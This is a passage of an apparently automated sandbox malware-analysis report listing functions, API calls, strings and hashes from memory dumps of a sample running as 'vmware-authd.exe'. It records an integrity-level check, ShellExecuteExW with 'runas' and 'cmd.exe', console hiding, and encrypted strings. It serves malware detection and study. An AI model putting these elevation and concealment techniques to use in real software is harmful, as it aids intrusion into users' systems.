Opcode ID: afc30b50fd6613669bb65fb465212ce94fc880d4751dd0c362cb15a7bc603f02
Instruction ID: 1649c9e1b6e20f9f58dc4a685687a8e925601d96f3a3f38cd4e72553b4f65b79
Opcode Fuzzy Hash: afc30b50fd6613669bb65fb465212ce94fc880d4751dd0c362cb15a7bc603f02
Instruction Fuzzy Hash: 34A01233A44019448B109184B4000FDB320D784261F110033D21DC1040A61214380180

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF848F121C9 Relevance: 12.7, Strings: 10, Instructions: 166COMMON

Download Yara Rule

Strings

HAH, xrefs: 00007FF848F12292
HAH, xrefs: 00007FF848F12358
HAH, xrefs: 00007FF848F1227B
H, xrefs: 00007FF848F122EE
HAH, xrefs: 00007FF848F12206
HAH, xrefs: 00007FF848F12305
HAH, xrefs: 00007FF848F12242
HAH, xrefs: 00007FF848F121EF
HAH, xrefs: 00007FF848F12341
HAH, xrefs: 00007FF848F122E3

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: H$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH
API String ID: 0-2162283993
Opcode ID: d4f44312c8213a11ff091f6835c0d708a1d0d23cecf499ab013660cde7826c8d
Instruction ID: 7d732ea2d0ad29bb980486e92308cb9b76e83257bdd8d2bcc83d2211ed0affd4
Opcode Fuzzy Hash: d4f44312c8213a11ff091f6835c0d708a1d0d23cecf499ab013660cde7826c8d
Instruction Fuzzy Hash: 4E41AE62E1998A5FF2D9E7AC58562BA53C2FBA9BD5F4500BAC00DD72C7DE286C030354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F36D65 Relevance: 9.0, Strings: 7, Instructions: 265COMMON

Download Yara Rule

Strings

HAH, xrefs: 00007FF848F36DCC
HAH, xrefs: 00007FF848F36E4D
HAH, xrefs: 00007FF848F36EA0
HAH, xrefs: 00007FF848F36EF8
HAH, xrefs: 00007FF848F36D85
5S_H, xrefs: 00007FF848F36D8F
HAH, xrefs: 00007FF848F36F4D

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: 5S_H$HAH$HAH$HAH$HAH$HAH$HAH
API String ID: 0-4022985793
Opcode ID: 2e7b84ceda144d51a0eec5a42c603c3dd05020851aa8cde54e2a0db2c2c0d3e3
Instruction ID: 0469d8d0efdfa39533c2b2318ad0ae2a8a63df1d783865894fdcf06477e0cc89
Opcode Fuzzy Hash: 2e7b84ceda144d51a0eec5a42c603c3dd05020851aa8cde54e2a0db2c2c0d3e3
Instruction Fuzzy Hash: 3D71C122F1DD4A5FE695FB3C949527967D2EBA8A90F0441BAC00EC32C7DE2C5C468349

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F104F2 Relevance: 7.8, Strings: 6, Instructions: 298COMMON

Download Yara Rule

Strings

O_^f, xrefs: 00007FF848F10722
O_^N, xrefs: 00007FF848F106C2
O_^v, xrefs: 00007FF848F10762
O_^t, xrefs: 00007FF848F1075A
?O_^, xrefs: 00007FF848F10501
O_^P, xrefs: 00007FF848F106C9

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: ?O_^$O_^N$O_^P$O_^f$O_^t$O_^v
API String ID: 0-1888848044
Opcode ID: 33ea989089b14d6b273ac7784f8609fd137f66af14abce62b70fc2aee0231fb1
Instruction ID: b221e0330f06b8dae0b50d577e4328c4a6fca96d963d1a003f1e08c61a85a7cb
Opcode Fuzzy Hash: 33ea989089b14d6b273ac7784f8609fd137f66af14abce62b70fc2aee0231fb1
Instruction Fuzzy Hash: 3081B417A1F562A9E25173BD74551EA2B60EFC13BDF1846B7D1CC8D0839E0C248A86BD

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F12A50 Relevance: 7.8, Strings: 6, Instructions: 255COMMON

Download Yara Rule

Strings

wU_H, xrefs: 00007FF848F12B93
HAH, xrefs: 00007FF848F12AEA
HAH, xrefs: 00007FF848F12A6E
HAH, xrefs: 00007FF848F12B89
HAH, xrefs: 00007FF848F12BAB
HAH, xrefs: 00007FF848F12B2D

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: HAH$HAH$HAH$HAH$HAH$wU_H
API String ID: 0-3701352555
Opcode ID: 42bedea73df2ee093e16130cfeec885323b9518371abb44f7f5df709459c2dd6
Instruction ID: 6aad76c088869eb631c6d0338df501e532c781977bb789b5c89460cab55b0196
Opcode Fuzzy Hash: 42bedea73df2ee093e16130cfeec885323b9518371abb44f7f5df709459c2dd6
Instruction Fuzzy Hash: 5B611432F1C94A4FE268E7BC68552BA67D1FB957A1F15427AC04EC32C6EE2C6C034395

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F32460 Relevance: 5.3, Strings: 4, Instructions: 270COMMON

Download Yara Rule

Strings

HAH, xrefs: 00007FF848F32B75
HAH, xrefs: 00007FF848F32BF7
HAH, xrefs: 00007FF848F3249A
HAH, xrefs: 00007FF848F32BAE

Memory Dump Source

Source File: 00000003.00000002.2066542911.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Update.jbxd

Similarity

API ID:
String ID: HAH$HAH$HAH$HAH
API String ID: 0-4204409433
Opcode ID: 41180736c7987fbb4bc23840bddafaf0788dc5d8bbb4e69d30d7123cde78a63a
Instruction ID: 83457189dd41e35cf00f64bae07e57070e6b0c6e9d24c8057b5ae8e07cacbc43
Opcode Fuzzy Hash: 41180736c7987fbb4bc23840bddafaf0788dc5d8bbb4e69d30d7123cde78a63a
Instruction Fuzzy Hash: D6712832E0DD8A5FE759E77C98652B93BE1EF96392F0401BBC009C71D7DE2858068395

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vmware-authd.exePID: 5456, Parent PID: 4432COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.2%
Total number of Nodes:	740
Total number of Limit Nodes:	20

Executed Functions

Function 6E0C5710 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 91
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32 ref: 6E0C57AA
WaitForSingleObject.KERNEL32(6E1172CD,000000FF), ref: 6E0C57B9
CloseHandle.KERNEL32(6E1172CD), ref: 6E0C57C2

Strings

%s, xrefs: 6E0C5E7A
<, xrefs: 6E0C5779
cmd.exe, xrefs: 6E0C5DB9, 6E0C5DEB, 6E0C6005, 6E0C602E
runas, xrefs: 6E0C573F, 6E0C5DC7, 6E0C5DEC, 6E0C6011, 6E0C602F
Vp5eLH/eFjeWnTMPTWLgR6xrUcIT57EPbvfBEA5pq/Y5jbOZ6q2y2v8/JL3AoZ2lFvnQoA3GOCAyqPCVz7elsgCvlNeE1p8Dca8ywvxDZVE=, xrefs: 6E0C5B5F
ufCyLvb8pVUBEpKYlM5UFnHYKI11bTbZS9RjMsLgKPt1w1zPUCEDXH6/CzyEo0lBuB+vnWHZZTmtZrX4S55j3Z/73BRUS3x8O2USNv4y1B/eu30ZDqW5FvhHKAKdtYyRj6D9R04QiPyzv61y3BU6+Q==, xrefs: 6E0C5D0A
zOYC/kp0FQFb5w5rmxM81w==, xrefs: 6E0C59D0
mQb2KKUk3V2nCZ0yAe+vNqYuiZBDmYPxXwmHi2Krhu0=, xrefs: 6E0C5F36

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: %s$<$Vp5eLH/eFjeWnTMPTWLgR6xrUcIT57EPbvfBEA5pq/Y5jbOZ6q2y2v8/JL3AoZ2lFvnQoA3GOCAyqPCVz7elsgCvlNeE1p8Dca8ywvxDZVE=$cmd.exe$mQb2KKUk3V2nCZ0yAe+vNqYuiZBDmYPxXwmHi2Krhu0=$runas$ufCyLvb8pVUBEpKYlM5UFnHYKI11bTbZS9RjMsLgKPt1w1zPUCEDXH6/CzyEo0lBuB+vnWHZZTmtZrX4S55j3Z/73BRUS3x8O2USNv4y1B/eu30ZDqW5FvhHKAKdtYyRj6D9R04QiPyzv61y3BU6+Q==$zOYC/kp0FQFb5w5rmxM81w==
API String ID: 3837156514-2646227059
Opcode ID: 9bbaaeb4bab022ac0329e78817ad3838f93a807c27dadc6392b0dac4dfc3556a
Instruction ID: b31a8b5fec2c84c3c7f4395a8b1c729997b795a22e23b211b6488e7cf504dbed
Opcode Fuzzy Hash: 9bbaaeb4bab022ac0329e78817ad3838f93a807c27dadc6392b0dac4dfc3556a
Instruction Fuzzy Hash: CE318D75D00209DFDF04CFE4D999BDEBBB4FB49714F608629E411AB680EB349688CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C6330 Relevance: 21.5, APIs: 6, Strings: 6, Instructions: 496
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000008,?,8F04FBE2,?,00000000,QPDwquPveU8ZByBjFPEnfX5Epuw8j/wgmGdYkMT/JArLLcx6jzc1EBPTASKRTl6F,00000040,00000000,?,?,?,EUa1BO0eslycZQ2QLiEFQA==,00000018,00000000,?,?), ref: 6E0C6364
OpenProcessToken.ADVAPI32(00000000,?,00000000,QPDwquPveU8ZByBjFPEnfX5Epuw8j/wgmGdYkMT/JArLLcx6jzc1EBPTASKRTl6F,00000040,00000000,?,?,?,EUa1BO0eslycZQ2QLiEFQA==,00000018,00000000,?,?,?,9vmKEHEGEzsnmsML22IJOQ==), ref: 6E0C636B
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 6E0C638B

Part of subcall function 6E0C4F90: GetModuleFileNameW.KERNEL32(00000000,?,00000104,8F04FBE2,?,00000000), ref: 6E0C4FDA

Part of subcall function 6E0C5710: ShellExecuteExW.SHELL32 ref: 6E0C57AA
Part of subcall function 6E0C5710: WaitForSingleObject.KERNEL32(6E1172CD,000000FF), ref: 6E0C57B9
Part of subcall function 6E0C5710: CloseHandle.KERNEL32(6E1172CD), ref: 6E0C57C2

FindCloseChangeNotification.KERNELBASE(?), ref: 6E0C639F
GetConsoleWindow.KERNELBASE(00000000,8F04FBE2), ref: 6E0C64CE
ShowWindow.USER32(00000000), ref: 6E0C64D5

Strings

9vmKEHEGEzsnmsML22IJOQ==, xrefs: 6E0C64E7
aN98Vn99RtRIIPypUOxxzg==, xrefs: 6E0C67AF
cmd.exe, xrefs: 6E0C5DB9, 6E0C5DEB, 6E0C6005, 6E0C602E, 6E0C669C
runas, xrefs: 6E0C573F, 6E0C5DC7, 6E0C5DEC, 6E0C6011, 6E0C602F, 6E0C6589
QPDwquPveU8ZByBjFPEnfX5Epuw8j/wgmGdYkMT/JArLLcx6jzc1EBPTASKRTl6F, xrefs: 6E0C66EF
EUa1BO0eslycZQ2QLiEFQA==, xrefs: 6E0C65E2

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: CloseProcessTokenWindow$ChangeConsoleCurrentExecuteFileFindHandleInformationModuleNameNotificationObjectOpenShellShowSingleWait
String ID: 9vmKEHEGEzsnmsML22IJOQ==$EUa1BO0eslycZQ2QLiEFQA==$QPDwquPveU8ZByBjFPEnfX5Epuw8j/wgmGdYkMT/JArLLcx6jzc1EBPTASKRTl6F$aN98Vn99RtRIIPypUOxxzg==$cmd.exe$runas
API String ID: 2461362732-3286299747
Opcode ID: 970b8e18735a122d1c51de9ea2a8cd4faf4833d3de1d0f78979a30c673b4e066
Instruction ID: fe2d7d546bb46f67651e77fea73385cda1adf4b6fe781b38509b8980dfa156b3
Opcode Fuzzy Hash: 970b8e18735a122d1c51de9ea2a8cd4faf4833d3de1d0f78979a30c673b4e066
Instruction Fuzzy Hash: 0402E4709101088FEB18CBE4DC94BFEBB79FF45B04F64861CE406ABA91DB745A85CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C64A0 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 366
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE(00000000,8F04FBE2), ref: 6E0C64CE
ShowWindow.USER32(00000000), ref: 6E0C64D5

Strings

9vmKEHEGEzsnmsML22IJOQ==, xrefs: 6E0C64E7
aN98Vn99RtRIIPypUOxxzg==, xrefs: 6E0C67AF
cmd.exe, xrefs: 6E0C669C
runas, xrefs: 6E0C6589
QPDwquPveU8ZByBjFPEnfX5Epuw8j/wgmGdYkMT/JArLLcx6jzc1EBPTASKRTl6F, xrefs: 6E0C66EF
EUa1BO0eslycZQ2QLiEFQA==, xrefs: 6E0C65E2

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: Window$ConsoleShow
String ID: 9vmKEHEGEzsnmsML22IJOQ==$EUa1BO0eslycZQ2QLiEFQA==$QPDwquPveU8ZByBjFPEnfX5Epuw8j/wgmGdYkMT/JArLLcx6jzc1EBPTASKRTl6F$aN98Vn99RtRIIPypUOxxzg==$cmd.exe$runas
API String ID: 3999960783-3286299747
Opcode ID: b49df564e188c27c3ff53239b621c96e78863841d7d83be2b66bd8f6ab246127
Instruction ID: 416e305a154600687cb4ee1d12151dcd3effc687f6aa3ee89ac952156ad18775
Opcode Fuzzy Hash: b49df564e188c27c3ff53239b621c96e78863841d7d83be2b66bd8f6ab246127
Instruction Fuzzy Hash: C2E101709101488FEB18CBE8DC94BEDBB79FF45B04F64865CD006ABA91CB745A85CB63

Uniqueness

Uniqueness Score: -1.00%

Function 6E10BB6F Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6E10B828: CreateFileW.KERNELBASE(00000000,00000000,?,6E10BC18,?,?,00000000,?,6E10BC18,00000000,0000000C), ref: 6E10B845

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E10BC83
__dosmaperr.LIBCMT ref: 6E10BC8A
GetFileType.KERNEL32(00000000), ref: 6E10BC96
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E10BCA0
__dosmaperr.LIBCMT ref: 6E10BCA9
CloseHandle.KERNEL32(00000000), ref: 6E10BCC9
CloseHandle.KERNEL32(00000000), ref: 6E10BE16
GetLastError.KERNEL32 ref: 6E10BE48
__dosmaperr.LIBCMT ref: 6E10BE4F

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 1016b342d762e0038b095fb6a36c9ace5438d26c17a46d78b781d37eb3fa7538
Instruction ID: 9f527b144f63f1756e2042df3245111f0f11849f99c3d652e8076ff3327fe489
Opcode Fuzzy Hash: 1016b342d762e0038b095fb6a36c9ace5438d26c17a46d78b781d37eb3fa7538
Instruction Fuzzy Hash: 31A13632A142558FCF09CFA8C891BED7BB5AB0A324F24415DE811AF394DF348D96EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E0EF7D6 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6E0EF81D
___scrt_uninitialize_crt.LIBCMT ref: 6E0EF837

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: cdf4e4bd8d5dd614cfde72c758c3902683e1ea0dea5a6e8abaafe417bc3aae88
Instruction ID: 53179ca260aef917bdf3d977d00fb90d42d037cc2d073cde5d4d46a05a48e73a
Opcode Fuzzy Hash: cdf4e4bd8d5dd614cfde72c758c3902683e1ea0dea5a6e8abaafe417bc3aae88
Instruction Fuzzy Hash: 8B412572D05625FFDB509FE5E900BAE36BDEB81B94F31453AE855A7690C7308D018BD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E0EF886 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6E0EF8C3
dllmain_crt_dispatch.LIBCMT ref: 6E0EF8DA
dllmain_raw.LIBCMT ref: 6E0EF922
dllmain_crt_dispatch.LIBCMT ref: 6E0EF935
dllmain_raw.LIBCMT ref: 6E0EF948

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 951aed1b6071a03582b669e8d29407f4878b0c85b7d3a2687fb191cb32c6815b
Instruction ID: 9db5375d31165bff85b2e1916915f12c57760277e09605d0873c49d8484134fd
Opcode Fuzzy Hash: 951aed1b6071a03582b669e8d29407f4878b0c85b7d3a2687fb191cb32c6815b
Instruction Fuzzy Hash: 2321D372D04625BFDB619E95EC40BAF3AAEEB81BD4F214536F85567650C3308D418BE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E102FCD Relevance: 3.1, APIs: 2, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6E10303B
_free.LIBCMT ref: 6E10305B

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 987df2ea0ca481e59166c4b10144238b2c0695164995c1b9382575fa6897374e
Instruction ID: 7e1622224b580adb9ad64414a0fda3a8b5fd693691f5c0a5a61d933f86561b67
Opcode Fuzzy Hash: 987df2ea0ca481e59166c4b10144238b2c0695164995c1b9382575fa6897374e
Instruction Fuzzy Hash: 1841D336B012049FDB10CFA8C894A9DB7F6EF88714B268568D515EB345DF31EE42DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E0EF6CF Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6E0EF71C

Part of subcall function 6E0EF345: InitializeSListHead.KERNEL32(6E17D9A8,6E0EF726,6E1340C0,00000010,6E0EF6B7,?,?,?,6E0EF8DF,?,00000001,?,?,00000001,?,6E134108), ref: 6E0EF34A

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E0EF786

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 4216693c0056492056346c1a14ee8205daa2f7330118e755d9a5ec8b1f026630
Instruction ID: 52b789c8f9263941c6f85a842f2d2e6c24f1e618988a7b5ae264f09b9ca44c2a
Opcode Fuzzy Hash: 4216693c0056492056346c1a14ee8205daa2f7330118e755d9a5ec8b1f026630
Instruction Fuzzy Hash: CA21023264C7159ECF80ABF0A4047DD37AD9F0336DF308839C8816BAC0DB365986D662

Uniqueness

Uniqueness Score: -1.00%

Function 6E10721C Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6E107268
GetFileType.KERNELBASE(00000000), ref: 6E10727A

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: c73372b542b0bcbef8778345afb32edb0ca6740b431e52488e06291df1225849
Instruction ID: 7d37671a616773962f896bc496e8da2b1f362f9ac52a0711c7f3a8987949c78e
Opcode Fuzzy Hash: c73372b542b0bcbef8778345afb32edb0ca6740b431e52488e06291df1225849
Instruction Fuzzy Hash: 6711B771608B528ACB70ADBE8C946127AD4BBA7330B340B5BF4B5865E5CEB0D9C5F140

Uniqueness

Uniqueness Score: -1.00%

Function 6E10BEB9 Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6E10BEDA

Part of subcall function 6E1044C5: RtlAllocateHeap.NTDLL(00000000,00013385,00013385,?,6E10F255,00000220,6E108B77,00013385,?,?,?,?,00000000,00000000,?,6E108B77), ref: 6E1044F7

HeapReAlloc.KERNEL32(00000000,00000000,00000020,00000004,00000000,?,6E10FB84,00000000,00000004,00000005,6E0C4EA4,?,?,6E103056,6E0C4EA4,00000005), ref: 6E10BF16

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

